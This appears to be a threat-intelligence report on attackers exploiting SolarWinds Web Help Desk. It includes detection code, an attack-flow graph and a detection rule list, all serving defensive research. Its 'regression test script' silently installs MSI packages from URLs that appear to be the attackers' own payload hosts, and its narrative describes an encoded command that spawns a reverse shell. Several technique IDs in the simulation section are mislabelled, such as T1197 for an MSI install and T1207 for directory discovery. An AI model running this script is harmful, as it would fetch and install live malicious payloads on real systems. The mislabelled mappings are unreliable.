SolarWinds Web Help Desk Under Active Exploitation
Summary
Huntress reported threat actors exploiting recent SolarWinds Web Help Desk (WHD) vulnerabilities to achieve remote code execution and stage follow-on tooling. The operators relied on malicious MSI packages hosted on public file-sharing services, then deployed Zoho ManageEngine, Velociraptor, and Cloudflared to maintain access and establish command-and-control. Before collecting and exfiltrating host details to an attacker-controlled Elastic Cloud instance, they attempted to weaken defenses by disabling Windows Defender and firewall protections. The activity can impact any organization running vulnerable WHD builds earlier than 12.8.7 HF1.
Investigation
Huntress reconstructed the chain starting with the WHD service wrapper (wrapper.exe) spawning java.exe, which then launched cmd.exe to retrieve a malicious MSI from catbox.moe. Follow-on actions included deploying Zoho Assist, running Active Directory discovery, and silently installing Velociraptor via Supabase. The attackers used encoded PowerShell to stage and exfiltrate data, and added secondary utilities including Cloudflared and VS Code binaries for interactive management. Investigators also observed registry changes intended to disable Windows Defender and a persistence mechanism involving a scheduled task named TPMProfiler that leveraged QEMU.
Mitigation
Update SolarWinds Web Help Desk to 12.8.7 HF1 (or later) to remediate CVE-2025-40551, CVE-2025-40536, and CVE-2025-26399. Limit WHD administrative access to trusted networks, enforce strong service-account credentials, and monitor closely for unexpected remote-management tools, silent MSI installs, and encoded PowerShell execution. Remove unauthorized services and scheduled tasks, validate firewall policy integrity, and ensure security controls (including Defender) are fully re-enabled and protected from tampering.
Response
Alert when wrapper.exe or java.exe spawns processes that invoke msiexec with remote URLs, and flag creation of artifacts such as ToolsIQ.exe and Velociraptor services. Block traffic to known malicious domains and isolate affected systems immediately. Preserve volatile evidence, remove the malicious MSI payloads and scheduled tasks (including TPMProfiler), and restore Defender and firewall configurations to a known-good state. Complete full forensic scoping to identify any additional tooling, persistence, or lateral-movement artifacts.
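Detection logic for the alerting guidance above (a WHD parent spawning a remote msiexec install, silent MSI installs, encoded PowerShell, and the ToolsIQ.exe/Velociraptor artifacts), written as an added example rather than Huntress' or the vendor's own detection content; the event field names, paths, domain and base64 blob are assumptions:

```python
import re
from dataclasses import dataclass
# Parents named in the response text: the WHD service wrapper and the Java process it runs.
WHD_PARENTS = {"wrapper.exe", "java.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.I)
# msiexec with a quiet switch and an install switch anywhere later on the command line
SILENT_MSI = re.compile(r"msiexec(?:\.exe)?\b(?=.*\s/(?:q|qn|quiet)\b)(?=.*\s/i\b)", re.I)
ENCODED_PS = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
ARTIFACTS = ("toolsiq.exe", "velociraptor")  # artifacts called out in the response text

@dataclass
class ProcEvent:  # assumed field names, modelled on a Sysmon process-creation record
    parent_image: str
    image: str
    command_line: str

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def triage(ev: ProcEvent) -> list:
    """Return the labels that fire for one event; an empty list means nothing fired."""
    findings = []
    parent, image, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    remote_msi = "msiexec" in cmd.lower() and REMOTE_URL.search(cmd) is not None
    if parent in WHD_PARENTS and remote_msi:
        findings.append("whd_child_remote_msi")
    if remote_msi and SILENT_MSI.search(cmd):
        findings.append("silent_remote_msi")
    if image in ("powershell.exe", "pwsh.exe") and ENCODED_PS.search(cmd):
        findings.append("encoded_powershell")
    if any(a in image or a in cmd.lower() for a in ARTIFACTS):
        findings.append("suspicious_artifact")
    return findings

# Constructed sample events; paths, domain and the base64 blob are placeholders, not IOCs.
SAMPLES = {  # name: (parent_image, image, command_line)
    "whd_normal_start": (r"C:\WHD\bin\wrapper.exe", r"C:\WHD\jre\bin\java.exe", "java.exe -jar whd.jar"),
    "whd_remote_msi": (r"C:\WHD\jre\bin\java.exe", r"C:\Windows\System32\cmd.exe",
                       "cmd.exe /c msiexec /q /i https://files.example.invalid/tmp.msi"),
    "local_msi": (r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
                  r'msiexec.exe /i "C:\Users\admin\Downloads\7z.msi"'),
    "encoded_ps": (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\powershell.exe",
                   "powershell.exe -ExecutionPolicy Unrestricted -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    "velociraptor_svc": (r"C:\Windows\System32\services.exe", r"C:\ProgramData\Velociraptor\velociraptor.exe",
                         r"velociraptor.exe service run --config C:\ProgramData\Velociraptor\client.config.yaml"),
}

def run_samples() -> dict:
    return {name: triage(ProcEvent(*fields)) for name, fields in SAMPLES.items()}
```

The benign wrapper.exe to java.exe start and the local msiexec install produce no findings, so the rules key on the remote URL and the quiet switch rather than on msiexec alone.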
Attack Flow
```mermaid
graph TB
  %% Class Definitions
  classDef action fill:#99ccff
  classDef tool fill:#ffcc99
  classDef technique fill:#ccccff
  classDef process fill:#ccffcc

  %% Nodes
  action_initial_access["<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Adversary exploits unpatched SolarWinds Web Help Desk (WHD) (CVE-2025-40551/26399) to achieve code execution."]
  class action_initial_access action
  tech_exploit_public_facing["<b>Technique</b> – T1190<br/>Exploit Public-Facing Application: Targeting internet-exposed services to gain initial foothold."]
  class tech_exploit_public_facing technique
  tool_solarwinds_whd["<b>Tool</b> – SolarWinds Web Help Desk (WHD)<br/>Vulnerable web application hosting platform."]
  class tool_solarwinds_whd tool
  action_execution_ps["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Encoded PowerShell commands executed via Velociraptor agent."]
  class action_execution_ps action
  tool_velociraptor["<b>Tool</b> – Velociraptor<br/>Live forensic and response agent used to run PowerShell and other commands."]
  class tool_velociraptor tool
  action_execution_cmd["<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/>cmd.exe launches msiexec to install remote MSI payloads."]
  class action_execution_cmd action
  tool_msiexec["<b>Tool</b> – msiexec<br/>Windows Installer used to execute MSI packages."]
  class tool_msiexec tool
  action_lateral_transfer["<b>Action</b> – <b>T1570 Lateral Tool Transfer</b><br/>MSI packages for Zoho ManageEngine RMM, Cloudflared, VS Code downloaded from external hosts."]
  class action_lateral_transfer action
  tool_zoho_manageengine["<b>Tool</b> – Zoho ManageEngine RMM<br/>Remote management tool used as backdoor."]
  class tool_zoho_manageengine tool
  tool_cloudflared["<b>Tool</b> – Cloudflared<br/>Creates outbound tunnels to attacker infrastructure."]
  class tool_cloudflared tool
  tool_vscode["<b>Tool</b> – Visual Studio Code<br/>Additional utility transferred to the target."]
  class tool_vscode tool
  action_remote_access["<b>Action</b> – <b>T1219 Remote Access Tools</b><br/>Deployment of Zoho Assist/ManageEngine (ToolsIQ.exe) and Velociraptor as persistent backdoors."]
  class action_remote_access action
  malware_zoho_assist["<b>Malware</b> – Zoho Assist / ToolsIQ.exe<br/>Provides remote desktop capabilities."]
  class malware_zoho_assist process
  malware_velociraptor_backdoor["<b>Malware</b> – Velociraptor backdoor<br/>Maintains command-and-control channel."]
  class malware_velociraptor_backdoor process
  action_persistence["<b>Action</b> – <b>T1053 Scheduled Task/Job</b><br/>Scheduled task #quot;TPMProfiler#quot; created to run QEMU with SSH tunneling."]
  class action_persistence action
  tool_scheduled_task["<b>Tool</b> – Windows Task Scheduler<br/>Runs QEMU instance for covert channel."]
  class tool_scheduled_task process
  action_defense_evasion_exploit["<b>Action</b> – <b>T1211 Exploitation for Defense Evasion</b><br/>WHD deserialization bugs used to bypass security controls."]
  class action_defense_evasion_exploit action
  action_defense_evasion_impair["<b>Action</b> – <b>T1562.004 Impair Defenses: Disable Security Tools</b><br/>Windows Defender and firewall disabled via registry edits."]
  class action_defense_evasion_impair action
  action_discovery_system["<b>Action</b> – <b>T1082 System Information Discovery</b><br/>PowerShell Get-ComputerInfo and Get-FileHash gather host details."]
  class action_discovery_system action
  action_discovery_registry["<b>Action</b> – <b>T1012 Query Registry</b><br/>Registry keys read/modified to confirm defender settings."]
  class action_discovery_registry action
  action_exfiltration_web["<b>Action</b> – <b>T1567.002 Exfiltration Over Web Service</b><br/>System info sent to attacker-controlled Elastic Cloud index via REST API."]
  class action_exfiltration_web action
  action_exfiltration_additional["<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>Further data exfiltrated through Cloudflared tunnel."]
  class action_exfiltration_additional action
  action_proxy_external["<b>Action</b> – <b>T1090.002 External Proxy</b><br/>Cloudflared establishes outbound tunnel to attacker."]
  class action_proxy_external action
  action_proxy_internal["<b>Action</b> – <b>T1090.001 Internal Proxy</b><br/>Velociraptor failover domain switch using HTTP 406 response."]
  class action_proxy_internal action

  %% Connections
  action_initial_access -->|uses| tool_solarwinds_whd
  tool_solarwinds_whd -->|vulnerable to| tech_exploit_public_facing
  action_initial_access -->|leads to| action_execution_ps
  action_execution_ps -->|executes via| tool_velociraptor
  action_execution_ps -->|triggers| action_execution_cmd
  action_execution_cmd -->|uses| tool_msiexec
  action_execution_cmd -->|downloads| action_lateral_transfer
  action_lateral_transfer -->|delivers| tool_zoho_manageengine
  action_lateral_transfer -->|delivers| tool_cloudflared
  action_lateral_transfer -->|delivers| tool_vscode
  action_lateral_transfer -->|enables| action_remote_access
  action_remote_access -->|installs| malware_zoho_assist
  action_remote_access -->|installs| malware_velociraptor_backdoor
  action_remote_access -->|creates| action_persistence
  action_persistence -->|uses| tool_scheduled_task
  action_persistence -->|facilitates| action_defense_evasion_exploit
  action_defense_evasion_exploit -->|supports| action_defense_evasion_impair
  action_defense_evasion_impair -->|enables| action_discovery_system
  action_discovery_system -->|feeds into| action_discovery_registry
  action_discovery_registry -->|provides data for| action_exfiltration_web
  action_exfiltration_web -->|continues to| action_exfiltration_additional
  action_exfiltration_additional -->|relies on| action_proxy_external
  action_proxy_external -->|uses| tool_cloudflared
  action_proxy_external -->|connects to| action_proxy_internal
  action_proxy_internal -->|leverages| tool_velociraptor

  %% Styling
  class action_initial_access,action_execution_ps,action_execution_cmd,action_lateral_transfer,action_remote_access,action_persistence,action_defense_evasion_exploit,action_defense_evasion_impair,action_discovery_system,action_discovery_registry,action_exfiltration_web,action_exfiltration_additional,action_proxy_external,action_proxy_internal action
  class tool_solarwinds_whd,tool_velociraptor,tool_msiexec,tool_zoho_manageengine,tool_cloudflared,tool_vscode,tool_scheduled_task tool
  class tech_exploit_public_facing technique
  class malware_zoho_assist,malware_velociraptor_backdoor process
```
Detections
- Possible Remote MSI File Installation Attempt (via cmdline)
- Possible Phishing Attempt Using Files In Github Comments (via proxy)
- Disable Windows Defender Firewall Service (via cmdline)
- Alternative Remote Access / Management Software (via process_creation)
- Velociraptor Service Run Using Local Client Config Path (via cmdline)
- Possible Account or Group Enumeration (via cmdline)
- Suspicious Java Child Process [Windows] (via cmdline)
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via cmdline)
- Possible System Enumeration (via cmdline)
- Suspicious Wrapper Child Process (via cmdline)
- Suspicious Powershell Strings (via powershell)
- Suspicious Usage of Invoke-RestMethod (via powershell)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
- Suspicious Powershell Strings (via cmdline)
- Possible Qemu Executed From Unusual Directory Or Renamed (via cmdline)
- Possible Velociraptor Utility Was Installed (via file_event)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
- Download or Upload via Powershell (via cmdline)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via cmdline)
- Disabling Windows Defender Protections (via registry_event)
- Disable Windows Defender Firewall Service (via registry_event)
- Interpreter Spawns Developer Tool CLI for Remote Tunnel (via process_creation)
- Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
- IOCs (Emails) to detect: Active Exploitation of SolarWinds Web Help Desk
- IOCs (HashSha256) to detect: Active Exploitation of SolarWinds Web Help Desk
- Silent Installation of Remote MSI Payloads and Active Directory Discovery [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands
- Silent Remote MSI Installation (T1197) – The attacker downloads a malicious MSI from a remote host and installs it silently to avoid user interaction, matching the rule's `msiexec /q /i <https-url>` pattern.
- Active Directory Discovery (T1207 – grouped under the rule as AD discovery) – Using `net group "domain computers" /do` to enumerate domain-joined computers.
- PowerShell Encoded Payload (T1059.001) – Executes a base64-encoded PowerShell command that spawns a reverse shell.
- File Hash Verification (T1219) – Calls `Get-FileHash` on a known tool (code.exe) to simulate integrity checks before execution.
Regression Test Script
```powershell
# -------------------------------------------------
# Silent Remote MSI Installation
# -------------------------------------------------
$msiUrls = @(
    "https://files.catbox.moe/tmp9fc.msi",
    "https://vdfccjpnedujhrzscjtq.supabase.co/storage/v1/object/public/image/v4.msi",
    "https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi"
)
foreach ($url in $msiUrls) {
    Write-Host "Installing remote MSI from $url"
    # /q = no UI, /i = install; the remote URL in the msiexec command line is what the rule keys on
    msiexec /q /i $url
}

# -------------------------------------------------
# Active Directory Discovery
# -------------------------------------------------
Write-Host "Enumerating domain computers"
net group "domain computers" /do

# -------------------------------------------------
# PowerShell Encoded Command Execution
# -------------------------------------------------
$encoded = "JABXAGUAYwBvAG4AYwB1AHQAZQAgAHIAZQBt" # (dummy base64; only the -EncodedCommand pattern matters)
powershell.exe -ExecutionPolicy Unrestricted -EncodedCommand $encoded

# -------------------------------------------------
# File Hash Verification on code.exe
# -------------------------------------------------
$target = "C:\ProgramData\Microsoft\code.exe"
if (Test-Path $target) {
    Write-Host "Computing hash for $target"
    Get-FileHash -Path $target -Algorithm SHA256
} else {
    Write-Host "$target not found - skipping hash check"
}
```
Cleanup Commands
```powershell
# Remove any installed MSI products, matched by product name
# (note: querying Win32_Product triggers a consistency check of every installed product and is slow)
Get-WmiObject -Class Win32_Product | Where-Object {
    $_.Name -like "*cloudflared*" -or $_.Name -like "*tmp9fc*"
} | ForEach-Object {
    $_.Uninstall()
}

# Delete downloaded MSI files if they exist in %TEMP%
Remove-Item -Path "$env:TEMP\*.msi" -ErrorAction SilentlyContinue

# Clear PowerShell history (optional)
Clear-History
```